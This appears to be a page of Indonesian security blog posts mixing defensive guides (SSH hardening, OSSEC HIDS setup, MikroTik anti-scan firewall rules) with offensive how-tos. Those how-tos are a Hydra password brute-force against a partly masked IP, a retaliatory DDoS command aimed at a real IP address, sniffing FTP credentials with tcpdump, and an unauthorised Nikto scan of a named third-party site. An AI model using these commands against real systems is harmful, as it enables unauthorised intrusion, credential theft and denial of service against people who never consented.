Mengamankan SSH Server

Mengamankan SSH Server

Pengamanan akses ke SSH Daemon pada server perlu untuk dilakukan karena salah satu target yang diincar para attacker, berikut beberapa langkah sederhana pengamanan ;

1. Buka file /etc/ssh/sshd_config

$ sudo nano /etc/ssh/sshd_config

2. Lakukan perubahan opsi sesuai kebutuhan pengamanan, contoh ;

Port  2020                    # mengganti port default (22) menjadi port 2020 (pastikan port 2020 tidak sedang anda gunakan )
LoginGraceTime 120  # timing waktu login ganti ke yang lebih kecil (jika perlu)
PermitRootLogin no   # memastikan tidak dapat login langsung ke root, jadi harus dari user biasa dulu baru bisa menjadi root
MaxAuthTries 3         # memutuskan koneksi jika login gagal lebih dari 3 kali
AllowUsers sysadmin predi # mengizinkan hanya user tertentu yang dapat login ke ssh contoh; sysadmn dan user predi saja yang boleh login dari ssh

3. Simpan file /etc/ssh/sshd_config

4. Restart service ssh

$ sudo /etc/init.d/ssh restart

Berikut contoh login dari shell linux

# ssh sysadmin@123.231.20.xx -p 2020

Semoga membantu, jika ada yang mau nambahin... silahkan

note: sample berjalan diatas ubuntu server

Read more »

Bruteforce with Hydra in backtrack 5

Dari pada gak ada kegiatan menjelang pulang kantor ane sempatin ngisi blog ini meski tulisan kali ini gak bermutu ( may be -_-" ) kadang ktia lupa password punya sendiri atau punya orang lain , nah dengan bantuan tools hydra kita bisa mencoba untuk membukanya namun keberhasilannya sangat tergantung pada kamus yang ada... heheh namanya juga bruteforce attack ^_^, makanya rajin-rajinlah koleksi kamus untuk hal ini.

oke simple aja perintahnya, seperti dibawah ini :

root@bt:~#hydra -l admin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -vV 110.137.xx.xxx http-get /

okeh selamat mencoba semoga berhasil... ane cabut pulang dulu.. c u ^_^

Read more »

Deteksi worm Conficker dalam jaringan dengan NMAP di BT 5

Okeh... sudah lama gak isi ni blog karena kesibukan yang gak jelas juga -_-"

sebelumnya melakukan scanning conficker dengan BT update dulu BT nya , jalanin perintah berikut ;

#svn co --username=guest --password='' svn://svn.insecure.org/nmap
#cd nmap
#./configure && make
#sudo make install

kemudian jalankan perintah Nmap dengan format (contoh) :

#nmap -PN -T4 -p139,445 -n -v --script=smb-check-vunlns --script-args safe=1 192.168.4.0/25

dimana 192.168.4.0/24 adalah range IP yang di scan jadi sesuaikan dengan punya anda.
okeh tested by me ... selamat mencoba ^_^

thanks to : Zee Eichel ( INdonesian Backtrack Team )





source :



1. http://www.indonesianbacktrack.or.id/?p=814


2. http://seclists.org/nmap-dev/2009/q1/870

Read more »

IDS with OSSEC HIDS

Implementasi IDS ( intrusion detection systems ) di linux dengan menggunakan OSSEC HIDS.

OSSEC HIDS, adalah paket aplikasi yang digunakan untuk memonitoring sistem dari aktifitas-aktifitas yang dianggap mengancam (menyerang) dan kemudian membuat log dan mampu memberikan peringatan via email ke system administrator.

OSSEC adalah aplikasi yang mampu berjalan multi platform, jadi silahkan anda implementasikan sesuai dengan sistem operasi yang anda gunakan, berikut adalah cara instalasi dan konfigurasi diatas sistem operasi linux, tepat nya ubuntu server 11.04.

1. Pastikan paket dasar di ubuntu telah lengkap, untuk menginstallnya;

$ sudo apt-get install build-essential

2. Download versi terbaru ossec , pada saat ini 2.6

$sudo wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz

3.Extract

$sudo tar -xzvf ossec-hids-2.6.tar.gz

4.masuk ke direktory extract dan jalankan perintah install.sh dan ikuti pentunjuk yang diberikan.

cd ossec-hids-2.6

./install.sh

berikut tampilan yang akan tampil kurang lebih ^_^;

----------

** Para instalação em português, escolha [br].
** Fur eine deutsche Installation wohlen Sie [de].
** For installation in English, choose [en].
** Per l'installazione in Italiano, scegli [it].
** Aby instalowac w jezyku Polskim, wybierz [pl].
** Türkçe kurulum için seçin [tr].
(en/br/de/it/pl/tr) [en]: en
OSSEC HIDS v0.8 Installation Script - http://www.ossec.net

You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).

- System: Linux diana 2.6.15-25-k7
- User: root - Host: xpredator


-- Press ENTER to continue or Ctrl-C to abort. --


1- What kind of installation do you want (server, agent, local or help)? local
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.

3.1- Do you want e-mail notification? (y/n) [y]: y
- What's your e-mail address? emailkita@email.com
- What's your SMTP server ip/host? your smtp server address (localhost)

3.2- Do you want to run the integrity check daemon? (y/n) [y]: y

- Running syscheck (integrity check daemon).

3.3- Do you want to run the rootkit detection engine? (y/n) [y]: y

- Running rootcheck (rootkit detection).

3.4- Active response allows you to execute a specific
command based on the events received. For example,
you can block an IP address or disable access for
a specific user.
More information at:

http://www.ossec.net/en/manual.html#active-response

- Do you want to enable active response? (y/n) [y]: y

- Active response enabled.

- By default, we can enable the host-deny and the
firewall-drop responses. The first one will add
a host to the /etc/hosts.deny and the second one
will block the host on iptables (if linux) or on
ipfilter (if Solaris, FreeBSD or NetBSD).
- They can be used to stop SSHD brute force scans,
portscans and some other forms of attacks. You can
also add them to block on snort events, for example.

- Do you want to enable the firewall-drop response? (y/n) [y]: y

- firewall-drop enabled (local) for levels >= 6

- Default white list for the active response:

- 192.168.2.1

- Do you want to add more IPs to the white list? (y/n)? [n]: n

3.6- Setting the configuration to analyze the following logs:

-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/log/mail.info
-- /var/log/apache2/error.log (apache log)
-- /var/log/apache2/access.log (apache log)

- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .

--- Press ENTER to continue ---
- Unknown system. No init script added.
- Configuration finished properly.

- To start OSSEC HIDS:

/var/ossec/bin/ossec-control start

- To stop OSSEC HIDS:

/var/ossec/bin/ossec-control stop

- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
(http://mailman.underlinux.com.br/mailman/listinfo/ossec-list).

More information can be found at http://www.ossec.net

--- Press ENTER to finish (maybe more information bellow). ---

/etc/init.d/ossec start

contoh tampilan (real) alert ke email ane, ;

----

OSSEC HIDS Notification.

2011 Aug 01 06:49:06

Received From: xpredator->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Aug 1 06:49:04 xpredator sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:55 xpredator sshd[31491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:45 xpredator sshd[31435]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:35 xpredator sshd[31426]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:26 xpredator sshd[31358]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:16 xpredator sshd[31302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:07 xpredator sshd[31295]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:47:58 xpredator sshd[31249]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root


--END OF NOTIFICATION



OSSEC HIDS Notification.
2011 Aug 01 06:49:08

Received From: xpredator->/var/log/auth.log
Rule: 5720 fired (level 10) -> "Multiple SSHD authentication failures."
Portion of the log(s):

Aug 1 06:49:06 xpredator sshd[31563]: Failed password for root from 122.228.197.134 port 59870 ssh2
Aug 1 06:48:57 xpredator sshd[31491]: Failed password for root from 122.228.197.134 port 59156 ssh2
Aug 1 06:48:47 xpredator sshd[31435]: Failed password for root from 122.228.197.134 port 58373 ssh2
Aug 1 06:48:37 xpredator sshd[31426]: Failed password for root from 122.228.197.134 port 57604 ssh2
Aug 1 06:48:28 xpredator sshd[31358]: Failed password for root from 122.228.197.134 port 56851 ssh2
Aug 1 06:48:18 xpredator sshd[31302]: Failed password for root from 122.228.197.134 port 56104 ssh2
Aug 1 06:48:09 xpredator sshd[31295]: Failed password for root from 122.228.197.134 port 55355 ssh2
Aug 1 06:47:59 xpredator sshd[31249]: Failed password for root from 122.228.197.134 port 54609 ssh2

--END OF NOTIFICATION

=============

Read more »

DDOS dalam BT 5

IDS (intrusion detection system) memberikan alert telah terjadi upaya serangan ke salah satu server ane, dan ane dapatin IP nya berasal dari China.

Selanjutnya ane respon dengan mencari tau dan scanning host IP tersebut sebagai respon balasan, gak puas ane coba serang DDOS dengan DDOSIM ke salah satu port yang terbuka dan potensial untuk diserang menurut ane. ^_^

berikut langkah2 nya

1. download ddosim di http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz

2. extract #tar -zxvf ddosim-0.2.tar.gz

3. ikuti perintah berikut :

#cd ddosim

#./configure

#make

#make install

4. ddosim siap digunakan, berikut petunjuk penggunannya ;

-------------------

# DDOSIM: Layer 7 DDoS Simulator v0.2
# Author: Adrian Furtuna


Usage: ./ddosim
-d IP Target IP address
-p PORT Target port
[-k NET] Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME] Output interface name
[-c COUNT] Number of connections to establish
[-w DELAY] Delay (in milliseconds) between SYN packets
[-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS] Number of threads to use when sending packets ( default 1)
[-n] Do not spoof source address (use local address)
[-v] Verbose mode (slower)
[-h] Print this help message

-------------------------------------------
contoh pengunaan :
# ddosim -d 122.228.197.134 -p 80 -r HTTP_INVALID -w 2 -c 5-t 5

selamat mencoba ^_^



note :
* pastikan telah terinstall library ; libnet0-dev disistem anda,
* dosa tanggung sendiri kalo ngerjain orang :p

Read more »

Tcpdump target port 21 ( FTP )

Jalankan perintah tcpdump di pc anda untuk menangkap username dan password ke FTP server, berikut perintahnya ;

#tcpdump -q -i eth0 -n -A port 21 > target.txt

setelah beberapa saat tekan tombol Ctrl + C untuk menghentikan sniffing, dan akan terlihat jumlah paket yang berhasil ditangkap.

untuk melakukan filter agar hanya username dan password saja yang ditampilkan , jalankan perintah ;

#cat target.txt | grep USER ; cat target.txt | grep PASSWORD

jika anda beruntung, username dan password akan ditampilkan.

oke good luck ;)

Read more »

Nikto part I

Salah satu program untuk scanning server yg terkenal adalah nikto ( cirt.net ) , berikut penulis mencoba untuk memberikan contoh implementasinya untuk scan server web, btw maaf ya yang punya server ane cuman iseng dan tidak merusak sistem anda jika ada intruder lain di sistem anda sama sekali saya tidak terlibat didalamnya ^_^.

1. contoh scan paling dasar dari nikto

root@bt:/pentest/web/nikto# perl nikto.pl -h jehz.com.my
- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 204.45.108.42 + Target Hostname: jehz.com.my + Target Port: 80 + Start Time: 2011-08-02 21:19:39 --------------------------------------------------------------------------- + Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 + Root page / redirects to: http://jehz.com.my/cgi-sys/suspendedpage.cgi + mod_ssl/2.2.19 appears to be outdated (current is at least 2.8.31) (may depend on server version) + Number of sections in the version string differ from those in the database, the server reports: openssl/0.9.8e-fips-rhel5 while the database has: 1.0.0.100. This may cause false positives. + OpenSSL/0.9.8e-fips-rhel5 appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current. + FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version) + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html + mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found. + /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon. + OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
--- cut ---

dari contoh keterangan diatas terlihat bahwa target memiliki beberapa bug dan masih ada lagi dibawahnya.
2. Untuk scan target dengan port tertentu

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 443

- Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 204.45.108.42 + Target Hostname: bliss.theservergroup.info + Target Port: 443 + Start Time: 2011-08-02 22:33:56 ---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

3.Scan terhadap beberapa port tertentu ;

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 80,88,443,22,21

- Nikto v2.1.4 --------------------------------------------------------------------------- + No web server found on bliss.theservergroup.info:88 ---------------------------------------------------------------------------

heheh itu aja dulu untuk kombinasi dengan tools lain ntar aja.... lagian orang tadarusan ane malah liat-liat yg gak ane... ntar malah merusak puasa ane ^_^.

Read more »

Anti Scanning Port pada Mikrotik

Scaning port pada server adalah salah satu teknik untuk mencari celah keamanan yang bisa dimanfaatkan oleh penyerang/intruder.

Di mikrotik kita bisa melakukan block terhadap serangan jenis ini dan sekaligus mengeblok ip asal penyerang , berikut scriptnya :

#---- script ---

/ip firewall filter add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="Port scanners to list " disabled=no
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP FIN Stealth scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/FIN scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="SYN/RST scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="FIN/PSH/URG scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="ALL/ALL scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP NULL scan"

# block ip penyerang

/ip firewall filter add chain=input src-address-list="port scanners" action=drop comment="dropping port scanners" disabled=no

#---------- end

Selamat mencoba ;)

Read more »

Security Mikrotik

Dari modul yang saya dapat berikut adalah perintah-perintah untuk melakukan proteksi keamanan di mikrotik, dengan melakukan blocking terhadap beberapa IP dan port.


berikut baris perintah tersebut ;

/ip firewall filter add chain=forward src-address=0.0.0.0/8 action=drop
/ip firewall filter add chain=forward dst-address=0.0.0.0/8 action=drop
/ip firewall filter add chain=forward src-address=127.0.0.0/8 action=drop
/ip firewall filter add chain=forward dst-address=127.0.0.0/8 action=drop
/ip firewall filter add chain=forward src-address=224.0.0.0/8 action=drop
/ip firewall filter add chain=forward dst-address=224.0.0.0/8 action=drop

/ip firewall filter add chain=forward protocol=tcp action=jump jump-target=tcp
/ip firewall filter add chain=forward protocol=udp action=jump jump-target=udp
/ip firewall filter add chain=forward protocol=icmp action=jump jump-target=icmp

/ip firewall filter add chain=udp protocol=udp dst-port=69 action=drop comment="deny TFTP"
/ip firewall filter add chain=udp protocol=udp dst-port=111 action=drop comment="deny PRC portmapper"
/ip firewall filter add chain=udp protocol=udp dst-port=135 action=drop comment="deny PRC portmapper"
/ip firewall filter add chain=udp protocol=udp dst-port=137-139 action=drop comment="deny NBT"
/ip firewall filter add chain=udp protocol=udp dst-port=2049 action=drop comment="deny NFS"
/ip firewall filter add chain=udp protocol=udp dst-port=3133 action=drop comment="deny BackOrifice"

/ip firewall filter add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address- list="port scaners" address-list-timeout=2w comment="port scanners to list" disabled=no

lebih detail mungkin nanti akan penulis jabarkan pada artikel yang lain. :D

thanks

Read more »